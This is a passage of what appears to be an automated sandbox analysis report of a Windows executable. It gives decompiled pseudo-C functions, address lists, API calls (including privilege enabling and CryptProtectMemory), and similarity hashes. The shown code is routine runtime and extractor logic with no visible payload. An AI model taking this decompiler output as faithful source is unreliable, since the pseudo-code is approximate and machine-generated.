    0x0083e84e
    0x0083e851
    0x00000000
    0x0083e851
    0x0083e856

    APIs
      • Part of subcall function 0083FD16: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0083FD31
      • Part of subcall function 0083FD16: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0083E82C,Crypt32.dll,?,0083E8AE,?,0083E892,?,?,?,?), ref: 0083FD53
    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0083E838
    • GetProcAddress.KERNEL32(00877350,CryptUnprotectMemory), ref: 0083E848
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AddressProc$DirectoryLibraryLoadSystem
    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
    • API String ID: 2141747552-1753850145
    • Opcode ID: 67bc66ea218d10effc8e39d6a74661b75964e93362f5bfe7946e37ce92960b5f
    • Instruction ID: d82043c7b8b95ba8191d8b8b5304a633191948a7c9b20c245992109830698556
    • Opcode Fuzzy Hash: 67bc66ea218d10effc8e39d6a74661b75964e93362f5bfe7946e37ce92960b5f
    • Instruction Fuzzy Hash: D9E04FB0905E47ABCF005B34E808601FBA4FB60700F1186A9F124D36D1EBB8D050CB91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E008573AF(signed int* __ecx, signed int __edx) {
    				signed int _v8;
    				intOrPtr* _v12;
    				signed int _v16;
    				signed int _t28;
    				signed int _t29;
    				intOrPtr _t33;
    				signed int _t37;
    				signed int _t38;
    				signed int _t40;
    				void* _t50;
    				signed int _t56;
    				intOrPtr* _t57;
    				signed int _t68;
    				signed int _t71;
    				signed int _t72;
    				signed int _t74;
    				signed int _t75;
    				signed int _t78;
    				signed int _t80;
    				signed int* _t81;
    				signed int _t85;
    				void* _t86;
    
    				_t72 = __edx;
    				_v12 = __ecx;
    				_t28 =  *__ecx;
    				_t81 =  *_t28;
    				if(_t81 != 0) {
    					_t29 =  *0x86d668; // 0x14325215
    					_t56 =  *_t81 ^ _t29;
    					_t78 = _t81[1] ^ _t29;
    					_t83 = _t81[2] ^ _t29;
    					asm("ror edi, cl");
    					asm("ror esi, cl");
    					asm("ror ebx, cl");
    					if(_t78 != _t83) {
    						L14:
    						 *_t78 = E008576B1( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
    						_t33 = E00852739(_t56);
    						_t57 = _v12;
    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
    						_t24 = _t78 + 4; // 0x4
    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00852739(_t24);
    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00852739(_t83);
    						_t37 = 0;
    						L15:
    						return _t37;
    					}
    					_t38 = 0x200;
    					_t85 = _t83 - _t56 >> 2;
    					if(_t85 <= 0x200) {
    						_t38 = _t85;
    					}
    					_t80 = _t38 + _t85;
    					if(_t80 == 0) {
    						_t80 = 0x20;
    					}
    					if(_t80 < _t85) {
    						L9:
    						_push(4);
    						_t80 = _t85 + 4;
    						_push(_t80);
    						_v8 = E0085AC84(_t56);
    						_t40 = E00857AC6(0);
    						_t68 = _v8;
    						_t86 = _t86 + 0x10;
    						if(_t68 != 0) {
    							goto L11;
    						}
    						_t37 = _t40 | 0xffffffff;
    						goto L15;
    					} else {
    						_push(4);
    						_push(_t80);
    						_v8 = E0085AC84(_t56);
    						E00857AC6(0);
    						_t68 = _v8;
    						_t86 = _t86 + 0x10;
    						if(_t68 != 0) {
    							L11:
    							_t56 = _t68;
    							_v8 = _t68 + _t85 * 4;
    							_t83 = _t68 + _t80 * 4;
    							_t78 = _v8;
    							_push(0x20);
    							asm("ror eax, cl");
    							_t71 = _t78;
    							_v16 = 0 ^  *0x86d668;
    							asm("sbb edx, edx");
    							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
    							_v8 = _t74;
    							if(_t74 == 0) {
    								goto L14;
    							}
    							_t75 = _v16;
    							_t50 = 0;
    							do {
    								_t50 = _t50 + 1;
    								 *_t71 = _t75;
    								_t71 = _t71 + 4;
    							} while (_t50 != _v8);
    							goto L14;
    						}
    						goto L9;
    					}
    				}
    				return _t28 | 0xffffffff;
    			}

























    0x008573af
    0x008573b9
    0x008573bd
    0x008573bf
    0x008573c3
    0x008573cd
    0x008573de
    0x008573e3
    0x008573e5
    0x008573e7
    0x008573e9
    0x008573eb
    0x008573ef
    0x008574a9
    0x008574b7
    0x008574b9
    0x008574be
    0x008574c5
    0x008574c7
    0x008574d5
    0x008574e4
    0x008574e7
    0x008574e9
    0x00000000
    0x008574ea
    0x008573f7
    0x008573fc
    0x00857401
    0x00857403
    0x00857403
    0x00857405
    0x0085740a
    0x0085740e
    0x0085740e
    0x00857411
    0x00857430
    0x00857430
    0x00857432
    0x00857435
    0x0085743e
    0x00857441
    0x00857446
    0x00857449
    0x0085744e
    0x00000000
    0x00000000
    0x00857450
    0x00000000
    0x00857413
    0x00857413
    0x00857415
    0x0085741e
    0x00857421
    0x00857426
    0x00857429
    0x0085742e
    0x00857458
    0x0085745b
    0x0085745d
    0x00857460
    0x00857468
    0x0085746e
    0x00857475
    0x00857477
    0x0085747f
    0x0085748e
    0x00857492
    0x00857494
    0x00857497
    0x00000000
    0x00000000
    0x00857499
    0x0085749c
    0x0085749e
    0x0085749e
    0x0085749f
    0x008574a1
    0x008574a4
    0x00000000
    0x0085749e
    0x00000000
    0x0085742e
    0x00857411
    0x00000000

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: 2f64251ab4fd68ed3c8323f828f4ef687f4deb6c594fb87da0b8055d88064a01
    • Instruction ID: c4f03dc96af735d2cb6bc60903eb6feec84a97cf6ea4592d31c96c4f18659866
    • Opcode Fuzzy Hash: 2f64251ab4fd68ed3c8323f828f4ef687f4deb6c594fb87da0b8055d88064a01
    • Instruction Fuzzy Hash: 9741F232A003109FCB24DF78D881A5DBBB5FF89325B1585A9E905EB391DB30AD09CB81
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0085AC01() {
    				int _v8;
    				void* __ecx;
    				void* _t6;
    				int _t7;
    				char* _t13;
    				int _t17;
    				void* _t19;
    				char* _t25;
    				WCHAR* _t27;
    
    				_t27 = GetEnvironmentStringsW();
    				if(_t27 == 0) {
    					L7:
    					_t13 = 0;
    				} else {
    					_t6 = E0085ABCA(_t27);
    					_pop(_t19);
    					_t17 = _t6 - _t27 >> 1;
    					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
    					_v8 = _t7;
    					if(_t7 == 0) {
    						goto L7;
    					} else {
    						_t25 = E00857B00(_t19, _t7);
    						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
    							_t13 = 0;
    						} else {
    							_t13 = _t25;
    							_t25 = 0;
    						}
    						E00857AC6(_t25);
    					}
    				}
    				if(_t27 != 0) {
    					FreeEnvironmentStringsW(_t27);
    				}
    				return _t13;
    			}












    0x0085ac10
    0x0085ac16
    0x0085ac6e
    0x0085ac6e
    0x0085ac18
    0x0085ac19
    0x0085ac1e
    0x0085ac27
    0x0085ac2d
    0x0085ac33
    0x0085ac38
    0x00000000
    0x0085ac3a
    0x0085ac40
    0x0085ac45
    0x0085ac63
    0x0085ac5d
    0x0085ac5d
    0x0085ac5f
    0x0085ac5f
    0x0085ac66
    0x0085ac6b
    0x0085ac38
    0x0085ac72
    0x0085ac75
    0x0085ac75
    0x0085ac83

    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 0085AC0A
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0085AC2D
      • Part of subcall function 00857B00: RtlAllocateHeap.NTDLL(00000000,?,?,?,00853006,?,0000015D,?,?,?,?,008544E2,000000FF,00000000,?,?), ref: 00857B32
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0085AC53
    • _free.LIBCMT ref: 0085AC66
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0085AC75
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
    • String ID:
    • API String ID: 336800556-0
    • Opcode ID: 3993096759b6d238e0e25de1f3decceaff627f7c63d33adf8181a22ccd0162f9
    • Instruction ID: a1b12cbe0c133419893c68076c470f85fe2d9b5fc0d2ef814e2583e0c625b16a
    • Opcode Fuzzy Hash: 3993096759b6d238e0e25de1f3decceaff627f7c63d33adf8181a22ccd0162f9
    • Instruction Fuzzy Hash: 9D0184726066157F232596BE6CCDC7F7A6DFBC6FA23160269FD04C3201DAA18C0581F2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E008585F5(void* __ecx, void* __edx) {
    				void* __esi;
    				intOrPtr _t2;
    				void* _t4;
    				void* _t10;
    				void* _t11;
    				void* _t13;
    				void* _t16;
    				long _t17;
    
    				_t11 = __ecx;
    				_t17 = GetLastError();
    				_t10 = 0;
    				_t2 =  *0x86d6ac; // 0x6
    				_t20 = _t2 - 0xffffffff;
    				if(_t2 == 0xffffffff) {
    					L2:
    					_t16 = E00857B91(_t11, 1, 0x364);
    					_pop(_t13);
    					if(_t16 != 0) {
    						_t4 = E00859C04(_t13, _t17, __eflags,  *0x86d6ac, _t16);
    						__eflags = _t4;
    						if(_t4 != 0) {
    							E008583E3(_t13, _t16, 0x890418);
    							E00857AC6(_t10);
    							__eflags = _t16;
    							if(_t16 != 0) {
    								goto L9;
    							} else {
    								goto L8;
    							}
    						} else {
    							_push(_t16);
    							goto L4;
    						}
    					} else {
    						_push(_t10);
    						L4:
    						E00857AC6();
    						L8:
    						SetLastError(_t17);
    					}
    				} else {
    					_t16 = E00859BAE(_t11, _t17, _t20, _t2);
    					if(_t16 != 0) {
    						L9:
    						SetLastError(_t17);
    						_t10 = _t16;
    					} else {
    						goto L2;
    					}
    				}
    				return _t10;
    			}











    0x008585f5
    0x00858600
    0x00858602
    0x00858604
    0x00858609
    0x0085860c
    0x0085861a
    0x00858626
    0x00858629
    0x0085862c
    0x0085863e
    0x00858643
    0x00858645
    0x00858650
    0x00858656
    0x0085865e
    0x00858660
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00858647
    0x00858647
    0x00000000
    0x00858647
    0x0085862e
    0x0085862e
    0x0085862f
    0x0085862f
    0x00858662
    0x00858663
    0x00858663
    0x0085860e
    0x00858614
    0x00858618
    0x0085866b
    0x0085866c
    0x00858672
    0x00000000
    0x00000000
    0x00000000
    0x00858618
    0x00858679

    APIs
    • GetLastError.KERNEL32(?,?,?,00857F47,00857BE3,?,0085859F,00000001,00000364,?,00852E6F,?,?,008700E0), ref: 008585FA
    • _free.LIBCMT ref: 0085862F
    • _free.LIBCMT ref: 00858656
    • SetLastError.KERNEL32(00000000,?,008700E0), ref: 00858663
    • SetLastError.KERNEL32(00000000,?,008700E0), ref: 0085866C
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast$_free
    • String ID:
    • API String ID: 3170660625-0
    • Opcode ID: 110cb5deddf90bcf75f1228ba4e9393a9c5871331c560729fb62614269c884b4
    • Instruction ID: 5c7c5025f8b60da7a9c2b6d00dc3de6f36d3b850de07486e0a5fd33614c350c0
    • Opcode Fuzzy Hash: 110cb5deddf90bcf75f1228ba4e9393a9c5871331c560729fb62614269c884b4
    • Instruction Fuzzy Hash: B101D136204A00FFD71266296C89D2B2699FBF1377B260126FC56F2252EE608C0D816A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E008403DE(void* __ecx) {
    				intOrPtr _v16;
    				void* __ebp;
    				int _t16;
    				void** _t21;
    				long* _t25;
    				void* _t28;
    				void* _t30;
    				intOrPtr _t31;
    
    				_t22 = __ecx;
    				_push(0xffffffff);
    				_push(E0086146D);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t31;
    				_t28 = __ecx;
    				E008406B1(__ecx);
    				_t25 = 0;
    				 *((char*)(__ecx + 0x194)) = 1;
    				ReleaseSemaphore( *(__ecx + 0x198), 0x20, 0);
    				if( *((intOrPtr*)(_t28 + 0x84)) > 0) {
    					_t21 = _t28 + 4;
    					do {
    						E008404D4(_t22, _t30,  *_t21);
    						CloseHandle( *_t21);
    						_t25 = _t25 + 1;
    						_t21 =  &(_t21[1]);
    					} while (_t25 <  *((intOrPtr*)(_t28 + 0x84)));
    				}
    				DeleteCriticalSection(_t28 + 0x1a0);
    				CloseHandle( *(_t28 + 0x198));
    				_t16 = CloseHandle( *(_t28 + 0x19c));
    				 *[fs:0x0] = _v16;
    				return _t16;
    			}











    0x008403de
    0x008403e7
    0x008403e9
    0x008403ee
    0x008403ef
    0x008403f9
    0x008403fb
    0x00840400
    0x00840402
    0x00840412
    0x0084041e
    0x00840420
    0x00840423
    0x00840425
    0x0084042c
    0x00840432
    0x00840433
    0x00840436
    0x00840423
    0x00840445
    0x00840451
    0x0084045d
    0x00840468
    0x00840473

    APIs
      • Part of subcall function 008406B1: ResetEvent.KERNEL32(?,?,00840400,?,?,?,?,0086146D,000000FF,?,0083A6B6,?,?,?,0086146D,000000FF), ref: 008406D1
      • Part of subcall function 008406B1: ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,?,0086146D,000000FF,?,0083A6B6,?,?,?,0086146D,000000FF), ref: 008406E5
    • ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 00840412
    • CloseHandle.KERNEL32(?,?), ref: 0084042C
    • DeleteCriticalSection.KERNEL32(?), ref: 00840445
    • CloseHandle.KERNEL32(?), ref: 00840451
    • CloseHandle.KERNEL32(?), ref: 0084045D
      • Part of subcall function 008404D4: WaitForSingleObject.KERNEL32(?,000000FF,008405F3,?,?,00840668,?,?,?,?,?,00840652), ref: 008404DA
      • Part of subcall function 008404D4: GetLastError.KERNEL32(?,?,00840668,?,?,?,?,?,00840652), ref: 008404E6
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
    • String ID:
    • API String ID: 1868215902-0
    • Opcode ID: 301db92887fb4310bef85beb320427dffe85b9c0c61bd1e20a0e2cf0d66bcacb
    • Instruction ID: 37f219c3ee4f4f568dc53875273cc3e49a8586230b95136963827e9fd284e0fe
    • Opcode Fuzzy Hash: 301db92887fb4310bef85beb320427dffe85b9c0c61bd1e20a0e2cf0d66bcacb
    • Instruction Fuzzy Hash: 0D019E32100F04EBCB219B68DC48F86BBAAFB45750F014559F2AA82560CBB52844DB51
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0085B4BC(intOrPtr* _a4) {
    				intOrPtr _t6;
    				intOrPtr* _t21;
    				void* _t23;
    				void* _t24;
    				void* _t25;
    				void* _t26;
    				void* _t27;
    
    				_t21 = _a4;
    				if(_t21 != 0) {
    					_t23 =  *_t21 -  *0x86dd50; // 0x86dd44
    					if(_t23 != 0) {
    						E00857AC6(_t7);
    					}
    					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x86dd54; // 0x89088c
    					if(_t24 != 0) {
    						E00857AC6(_t8);
    					}
    					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x86dd58; // 0x89088c
    					if(_t25 != 0) {
    						E00857AC6(_t9);
    					}
    					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x86dd80; // 0x86dd48
    					if(_t26 != 0) {
    						E00857AC6(_t10);
    					}
    					_t6 =  *((intOrPtr*)(_t21 + 0x34));
    					_t27 = _t6 -  *0x86dd84; // 0x890890
    					if(_t27 != 0) {
    						return E00857AC6(_t6);
    					}
    				}
    				return _t6;
    			}










    0x0085b4c2
    0x0085b4c7
    0x0085b4cb
    0x0085b4d1
    0x0085b4d4
    0x0085b4d9
    0x0085b4dd
    0x0085b4e3
    0x0085b4e6
    0x0085b4eb
    0x0085b4ef
    0x0085b4f5
    0x0085b4f8
    0x0085b4fd
    0x0085b501
    0x0085b507
    0x0085b50a
    0x0085b50f
    0x0085b510
    0x0085b513
    0x0085b519
    0x00000000
    0x0085b521
    0x0085b519
    0x0085b524

    APIs
    • _free.LIBCMT ref: 0085B4D4
      • Part of subcall function 00857AC6: RtlFreeHeap.NTDLL(00000000,00000000,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?), ref: 00857ADC
      • Part of subcall function 00857AC6: GetLastError.KERNEL32(?,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?,?), ref: 00857AEE
    • _free.LIBCMT ref: 0085B4E6
    • _free.LIBCMT ref: 0085B4F8
    • _free.LIBCMT ref: 0085B50A
    • _free.LIBCMT ref: 0085B51C
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 24267970c9f8a93f180152a5e032a37b77f9f91b33fb886d692ce4487e556b09
    • Instruction ID: 6437073ea591ae8df98676de5326d66add0f6c42ffe59db03de39f4f587d7da4
    • Opcode Fuzzy Hash: 24267970c9f8a93f180152a5e032a37b77f9f91b33fb886d692ce4487e556b09
    • Instruction Fuzzy Hash: 9FF0F632A05310BF8632FF58F886C1AB7DDFB503123599804F808C7612CB30FC848615
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E00856C99(void* __ecx, void* __edx, intOrPtr _a4) {
    				signed int _v8;
    				void* _v12;
    				char _v16;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr* _t36;
    				struct HINSTANCE__* _t37;
    				struct HINSTANCE__* _t43;
    				intOrPtr* _t44;
    				intOrPtr* _t45;
    				CHAR* _t49;
    				struct HINSTANCE__* _t50;
    				void* _t52;
    				struct HINSTANCE__* _t55;
    				intOrPtr* _t59;
    				struct HINSTANCE__* _t64;
    				intOrPtr _t65;
    
    				_t52 = __ecx;
    				if(_a4 == 2 || _a4 == 1) {
    					E0085A80E(_t52);
    					GetModuleFileNameA(0, 0x8902b8, 0x104);
    					_t49 =  *0x890868; // 0x5a3310
    					 *0x890870 = 0x8902b8;
    					if(_t49 == 0 ||  *_t49 == 0) {
    						_t49 = 0x8902b8;
    					}
    					_v8 = 0;
    					_v16 = 0;
    					E00856DBD(_t52, _t49, 0, 0,  &_v8,  &_v16);
    					_t64 = E00856F32(_v8, _v16, 1);
    					if(_t64 != 0) {
    						E00856DBD(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
    						if(_a4 != 1) {
    							_v12 = 0;
    							_push( &_v12);
    							_t50 = E0085A329(_t49, 0, _t64, _t64);
    							if(_t50 == 0) {
    								_t59 = _v12;
    								_t55 = 0;
    								_t36 = _t59;
    								if( *_t59 == 0) {
    									L15:
    									_t37 = 0;
    									 *0x89085c = _t55;
    									_v12 = 0;
    									_t50 = 0;
    									 *0x890860 = _t59;
    									L16:
    									E00857AC6(_t37);
    									_v12 = 0;
    									goto L17;
    								} else {
    									goto L14;
    								}
    								do {
    									L14:
    									_t36 = _t36 + 4;
    									_t55 =  &(_t55->i);
    								} while ( *_t36 != 0);
    								goto L15;
    							}
    							_t37 = _v12;
    							goto L16;
    						}
    						 *0x89085c = _v8 - 1;
    						_t43 = _t64;
    						_t64 = 0;
    						 *0x890860 = _t43;
    						goto L10;
    					} else {
    						_t44 = E00857F42();
    						_push(0xc);
    						_pop(0);
    						 *_t44 = 0;
    						L10:
    						_t50 = 0;
    						L17:
    						E00857AC6(_t64);
    						return _t50;
    					}
    				} else {
    					_t45 = E00857F42();
    					_t65 = 0x16;
    					 *_t45 = _t65;
    					E00857E21();
    					return _t65;
    				}
    			}





















    0x00856c99
    0x00856ca6
    0x00856cc6
    0x00856cd9
    0x00856cdf
    0x00856ce5
    0x00856ced
    0x00856cf4
    0x00856cf4
    0x00856cf9
    0x00856d00
    0x00856d07
    0x00856d19
    0x00856d20
    0x00856d3f
    0x00856d4b
    0x00856d66
    0x00856d69
    0x00856d70
    0x00856d76
    0x00856d7d
    0x00856d80
    0x00856d82
    0x00856d86
    0x00856d90
    0x00856d90
    0x00856d92
    0x00856d98
    0x00856d9b
    0x00856d9d
    0x00856da3
    0x00856da4
    0x00856daa
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00856d88
    0x00856d88
    0x00856d88
    0x00856d8b
    0x00856d8c
    0x00000000
    0x00856d88
    0x00856d78
    0x00000000
    0x00856d78
    0x00856d51
    0x00856d56
    0x00856d58
    0x00856d5a
    0x00000000
    0x00856d22
    0x00856d22
    0x00856d27
    0x00856d29
    0x00856d2a
    0x00856d5f
    0x00856d5f
    0x00856dad
    0x00856dae
    0x00000000
    0x00856db7
    0x00856cae
    0x00856cae
    0x00856cb5
    0x00856cb6
    0x00856cb8
    0x00000000
    0x00856cbd

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\9nZ3r5ZN45.exe,00000104), ref: 00856CD9
    • _free.LIBCMT ref: 00856DA4
    • _free.LIBCMT ref: 00856DAE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$FileModuleName
    • String ID: C:\Users\user\Desktop\9nZ3r5ZN45.exe
    • API String ID: 2506810119-2970394950
    • Opcode ID: f52678c8036389e2be598897a3a5bdc2c658ba90f82103d3a3918edc1b4423d5
    • Instruction ID: b460b5abd4ade0603ce363cc153c25a6f054fafd0e9535ba952fa9385a0af000
    • Opcode Fuzzy Hash: f52678c8036389e2be598897a3a5bdc2c658ba90f82103d3a3918edc1b4423d5
    • Instruction Fuzzy Hash: CC319A71A04218AFDB21EF999C8199EBBFCFB85311F5480A6FC04E7211E6718E58CB91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E008374AC(void* __ebx, void* __ecx, void* __edx, void* __esi) {
    				void* _t26;
    				long _t32;
    				void* _t39;
    				void* _t42;
    				intOrPtr _t43;
    				void* _t58;
    				void* _t59;
    				void* _t62;
    
    				_t58 = __esi;
    				_t42 = __ebx;
    				E0084D8C4(E008613A5, __ecx);
    				E0084D9C0();
    				 *((intOrPtr*)(_t62 - 0x20)) = 0;
    				 *((intOrPtr*)(_t62 - 0x1c)) = 0;
    				 *((intOrPtr*)(_t62 - 0x18)) = 0;
    				 *((intOrPtr*)(_t62 - 0x14)) = 0;
    				 *((char*)(_t62 - 0x10)) = 0;
    				_t55 =  *((intOrPtr*)(_t62 + 8));
    				_push(0);
    				_push(0);
    				 *((intOrPtr*)(_t62 - 4)) = 0;
    				_push(_t62 - 0x20);
    				if(E00833AAF( *((intOrPtr*)(_t62 + 8)), __edx) != 0) {
    					if( *0x870042 == 0) {
    						if(E00837B08(L"SeSecurityPrivilege") != 0) {
    							 *0x870041 = 1;
    						}
    						E00837B08(L"SeRestorePrivilege");
    						 *0x870042 = 1;
    					}
    					_push(_t58);
    					_t59 = 7;
    					if( *0x870041 != 0) {
    						_t59 = 0xf;
    					}
    					_push(_t42);
    					_t43 =  *((intOrPtr*)(_t62 - 0x20));
    					_push(_t43);
    					_push(_t59);
    					_push( *((intOrPtr*)(_t62 + 0xc)));
    					if( *0x86de80() == 0) {
    						if(E0083B3C9( *((intOrPtr*)(_t62 + 0xc)), _t62 - 0x106c, 0x800) == 0) {
    							L10:
    							E00831F29(_t71, 0x52, _t55 + 0x1e,  *((intOrPtr*)(_t62 + 0xc)));
    							_t32 = GetLastError();
    							E0084E76A(_t32);
    							if(_t32 == 5 && E0083FCB1() == 0) {
    								E00831558(_t62 - 0x6c, 0x18);
    								E00840AC7(_t62 - 0x6c);
    							}
    							E00836F18(0x8700e0, 1);
    						} else {
    							_t39 =  *0x86de80(_t62 - 0x106c, _t59, _t43);
    							_t71 = _t39;
    							if(_t39 == 0) {
    								goto L10;
    							}
    						}
    					}
    				}
    				_t26 = E0083158D(_t62 - 0x20);
    				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
    				return _t26;
    			}











    0x008374ac
    0x008374ac
    0x008374b1
    0x008374bb
    0x008374c3
    0x008374c6
    0x008374c9
    0x008374cc
    0x008374cf
    0x008374d2
    0x008374d7
    0x008374d8
    0x008374d9
    0x008374df
    0x008374e7
    0x008374f4
    0x00837502
    0x00837504
    0x00837504
    0x00837510
    0x00837515
    0x00837515
    0x00837523
    0x00837526
    0x00837527
    0x0083752b
    0x0083752b
    0x0083752c
    0x0083752d
    0x00837530
    0x00837531
    0x00837532
    0x0083753d
    0x00837555
    0x0083756a
    0x00837573
    0x00837578
    0x00837587
    0x0083758f
    0x0083759f
    0x008375a7
    0x008375a7
    0x008375b0
    0x00837557
    0x00837560
    0x00837566
    0x00837568
    0x00000000
    0x00000000
    0x00837568
    0x00837555
    0x008375b6
    0x008375ba
    0x008375c3
    0x008375cd

    APIs
    • __EH_prolog.LIBCMT ref: 008374B1
      • Part of subcall function 00833AAF: __EH_prolog.LIBCMT ref: 00833AB4
    • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00837578
      • Part of subcall function 00837B08: GetCurrentProcess.KERNEL32(00000020,?), ref: 00837B17
      • Part of subcall function 00837B08: GetLastError.KERNEL32 ref: 00837B5D
      • Part of subcall function 00837B08: CloseHandle.KERNEL32(?), ref: 00837B6C
    Strings
    Memory Dump Source
